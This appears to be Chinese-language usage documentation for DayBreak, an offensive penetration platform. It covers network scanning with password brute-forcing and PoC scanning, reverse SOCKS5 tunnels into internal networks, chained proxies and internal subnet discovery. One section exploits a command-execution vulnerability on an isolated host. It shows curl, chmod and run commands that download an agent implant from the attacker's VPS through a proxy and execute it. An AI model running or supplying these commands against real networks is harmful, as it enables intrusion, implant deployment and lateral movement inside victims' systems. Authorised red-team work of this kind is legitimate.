Skip to content

使用实例

1. 扫描任务

扫描步骤顺序

主机存活
Netbios识别
端口扫描
服务识别
HTTP发现
WEB指纹识别
服务弱口令爆破
文件目录爆破
PoC扫描

在任务管理界面点击新增加任务按钮,填入任务名称,目标站点,根据实际情况勾选选项即可。

扫描目标可以为IP,IP段,子域名, 可同时下发多个,多个之间可以用逗号、空白符号分割

其中WEB指纹识别可能会占用比较大的内存,扫描过程中在300M-1G内存浮动,也和目标网络站点数目相关。

2. 内网代理转发

简介

使用rsocks命令可以轻松构建穿透内网的反向代理。

rsocks命令执行成功会在BAS 服务端监听一个端口,并建立socks5代理,可以反向代理到处于内网的Agent 网络中。

使用

Usage of rsocks:
  -A string
     反向代理平台地址
  -P string
     反向socks5 密码
  -U string
     反向socks5 用户名
  -p int
     反向socks5 监听端口 (default 2339)
  -x string
     上游代理socks5 地址,格式:socks5://ip:port

创建反向socks5代理,监听端口为控制端上

-A 参数默认为 配置文件中的地址platform_host, 端口为:reverse_proxy_server_port -p 在DayBreak 服务端监听的端口 -x 上游代理socks5 地址,格式:socks5://ip:port, 用这个参数可以实现代理级联。

简单实例

启动

请确保2339端口没有被占用,也就是如果需要建立多个反向代理需要使用-p参数指定不同的端口

rsocks -U admin  -P 123456 -p 2339

验证
curl -x socks5://admin:123456@vps:2339 https://www.baidu.com

vps 是 DayBreak 服务端的地址

curl baidu.com 的流量是从Agent出去的。

下面是agent的日志

关闭
jobkill 2

3. 不出网上线

基本环境如下A,B主机在同一内网,A B 主机可以互通,当时B 主机无互联网权限。

此时A主机已经上线,B主机存在命令执行漏洞

先在A 主机上执行socks -p 3337, 将会在A主机上构建一个socks代理。

在B主机上利用漏洞执行下面的命令,利用curl的加上代理下载探针文件, 再探针上线的时候配置代理即可上线。

curl -x socks5://AIP:3337 -skO http://VPS:8284/d/grx80p4x
chmod +x grx80p4x
./grx80p4x  agent -x socks5://AIP:3337   -u http://VPS:8284
-s gfee1m8z

执行成功可以上线

4. 不出网代理转发

基本环境如下A,B主机在同一内网,A B 主机可以互通,当时B 主机无互联网权限。此时A, B 主机已经上线。

在B主机上执行socks -p 3338, 将会在B主机上构建一个socks代理。

socks -p 3338

在A主机上执行rsocks -p 8285 -x socks5://172.29.1.2:3338, 将会在VPS 上监听8285端口,流量出口先到达A 主机,然后再通过B主机的3338端口出去。

rsocks -p 8285 -x socks5://172.29.1.2:3338

下面是B 主机上 的验证, 可以看到可以直接通过DayBreak服务端直接连接不出网主机B的本地端口1234

curl -x socks5://VPS:8285 http://127.0.0.1:1234

5. 内网C段快速探测

如需要探测10.0.0.0/16 这个B 段中有那些使用的C段, 一般情况下B段地址不会全部使用,只会有少部分C段去使用,如果这个时候去扫描整个B 段将会比较耗时。

目标就直接写10.0.0.0/16, 端口扫描选择top10, 并选择对应的会话。

扫描配置选项如下,主机存活并发数目稍微调大了点。 并勾选了C 段IP地址随机扫描选项。取消勾选网站指纹识别。

大概5分钟内探测完毕

对C 段数据进行导出,可以通过任务详情 C 段选项,进行导出,再根据自己的情况进行下一步动作。